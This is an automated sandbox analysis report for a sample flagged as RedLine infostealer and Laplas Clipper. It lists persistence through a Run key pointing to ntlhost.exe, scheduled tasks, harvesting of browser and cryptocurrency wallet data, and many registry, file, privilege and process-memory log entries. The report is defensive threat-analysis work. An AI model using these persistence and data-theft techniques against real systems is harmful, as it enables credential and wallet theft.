Malware Analysis Report

2024-10-23 15:43

Sample ID 230725-qhnewacf47
Target raid macro3.rec
SHA256 a0a24efa02d4462fc7bbe2e322b4c82e4ff1f9e4194a0a86eea566302bec2021
Tags
laplas redline @ljagyxa clipper discovery infostealer persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a0a24efa02d4462fc7bbe2e322b4c82e4ff1f9e4194a0a86eea566302bec2021

Threat Level: Known bad

The file raid macro3.rec was found to be: Known bad.

Malicious Activity Summary

laplas redline @ljagyxa clipper discovery infostealer persistence spyware stealer

Laplas Clipper

RedLine

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Registers COM server for autorun

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in Program Files directory

Enumerates physical storage devices

NTFS ADS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

GoLang User-Agent

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Modifies registry class

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Creates scheduled task(s)

Checks processor information in registry

Suspicious use of SendNotifyMessage

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-25 13:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-25 13:15

Reported

2023-07-25 13:23

Platform

win10-20230703-en

Max time kernel

444s

Max time network

443s

Command Line

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\raid macro3.rec"

Signatures

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2301-x64.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3229013990-3330391637-2814184332-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\7-Zip\Lang\kab.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ar.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\io.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\bn.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ga.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mr.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tt.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.dll C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lt.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nb.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mn.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nl.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\uk.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\bg.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kk.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fur.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nn.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tk.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\va.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fy.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ko.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tg.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\af.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\be.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sq.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hu.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ka.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lv.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ug.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fr.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gl.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\readme.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\en.ttt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\vi.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\cs.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hr.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pl.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sw.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File created C:\Program Files\7-Zip\Lang\tg.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.sfx C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ku.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\descript.ion C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ast.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File created C:\Program Files\7-Zip\Lang\sw.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File created C:\Program Files\7-Zip\Lang\uz-cyrl.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\yo.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\de.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ru.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ba.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Uninstall.exe C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\History.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gu.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hi.txt C:\Users\Admin\Downloads\7z2301-x64.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3229013990-3330391637-2814184332-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3229013990-3330391637-2814184332-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2301-x64.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\script.rar:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\7z2301-x64.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\script\script.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\script\script.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\script\script.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\script\script.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\script\script.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: 35 N/A C:\Windows\System32\Conhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\script\script.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\script\script.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 4744 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 4744 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
